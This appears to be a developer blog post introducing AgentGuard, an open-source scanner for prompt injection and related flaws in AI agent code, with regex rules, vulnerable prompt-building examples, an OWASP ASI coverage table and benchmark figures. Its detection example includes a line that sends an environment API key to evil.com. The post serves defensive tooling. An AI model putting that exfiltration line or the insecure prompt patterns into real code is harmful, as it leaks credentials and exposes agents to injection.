Beyond Regex: Building Detection Rules for AI Agent Vulnerabilities
When I started building AgentGuard, the first question was: how do you detect a prompt injection vulnerability in source code?
Unlike traditional vulnerabilities (SQL injection, XSS), prompt injection doesn't have a single signature. It's a pattern of untrusted data flowing into LLM context. The vulnerability isn't in a function call -- it's in how data is constructed.
The Regex Foundation
Every SAST tool starts with pattern matching. AgentGuard's first layer is regex-based rules:
# ASI01: Prompt Injection
FSTRING_INJECTION = re.compile(
r'(?:prompt|system|message|instruction)\s*[:=]\s*f["\'].*\{.*\}',
re.I
)
This catches the most common pattern: f-strings that embed user input directly into LLM prompts. It is blunt but effective. In a scan of 50 open-source agent codebases, this single rule found 127 instances.
The Problem with Regex
Regex has limits. Consider:
# Pattern A: Obvious
prompt = f"You are a helper. {user_input}"
# Pattern B: Subtle
template = "You are a helper. {input}"
prompt = template.format(input=user_data)
# Pattern C: Hidden
messages = [{"role": "system", "content": config["system_prompt"] + user_message}]
Pattern A is trivial to detect. Pattern B requires understanding .format() semantics. Pattern C requires tracking data flow through dictionaries and list construction.
This is where AgentGuard is headed next: AST-based semantic analysis.
The AST Layer (Roadmap)
The next version of AgentGuard will parse Python and JavaScript ASTs to track taint flow:
-
Identify sources: function parameters named
user_input,query,message,request.body - Track propagation: variable assignments, string formatting, list/dict construction
-
Identify sinks:
openai.chat.completions.create,prompt,messages,system - Flag paths: any path from source to sink without sanitization
This is the same approach Semgrep and CodeQL use for traditional vulnerabilities, but specialized for LLM-specific sinks.
Correlation Detection
AgentGuard already does a simple form of correlation for ASI03 (Data Exfiltration):
# Line 1: Secret access
api_key = os.environ.get("API_KEY")
# Line 2: Network call
requests.post("https://evil.com/collect", headers={"Auth": api_key})
The rule checks if a secret-access pattern appears on line N and a network-exfiltration pattern appears on line N+1. This catches the most dangerous pattern: an agent that reads credentials and sends them externally.
Future versions will extend this to full function-level taint tracking.
The OWASP ASI Top 10 Coverage
AgentGuard currently covers all 10 categories:
| ASI | Rule | Detection Method |
|---|---|---|
| ASI01 | Prompt Injection | Regex (f-string, concat, format) |
| ASI02 | Tool Abuse | Regex (os.system, subprocess, eval) |
| ASI03 | Data Exfiltration | Regex + cross-line correlation |
| ASI04 | Excessive Agency | Regex (auto-execute, no-confirm) |
| ASI05 | Supply Chain | Regex (untrusted pip install, dynamic import) |
| ASI06 | Insecure Output | Regex (raw HTML, eval output) |
| ASI07 | Credential Exposure | Regex (API keys, private keys, passwords) |
| ASI08 | Context Manipulation | Regex (context stuffing, token bombing) |
| ASI09 | Agent Loop Exploitation | Regex (recursive calls, no depth limit) |
| ASI10 | Trust Boundary | Regex (mixed privilege, cross-agent calls) |
Benchmark Results
The benchmark suite has 28 samples:
- ASI01 (6 samples): 100% detection
- ASI02 (5 samples): 100% detection
- ASI03 (4 samples): 100% detection
- ASI07 (6 samples): 100% detection
- ASI10 (5 samples): 100% detection
- Clean (2 samples): 0% false positives
What's Next
- AST-based taint tracking for Python and JavaScript
- Language support: Rust, Go, Java
- GitHub Code Scanning integration via SARIF
- MCP server mode for real-time scanning in AI coding assistants
- Semantic injection detection -- understanding prompt structure, not just string patterns
The long-term goal is simple: make AI agent code as auditable as web application code. We have Semgrep for web apps. We need AgentGuard for agent apps.
AgentGuard is MIT-licensed and open source. Install with pip install dfx-agentguard.
Top comments (0)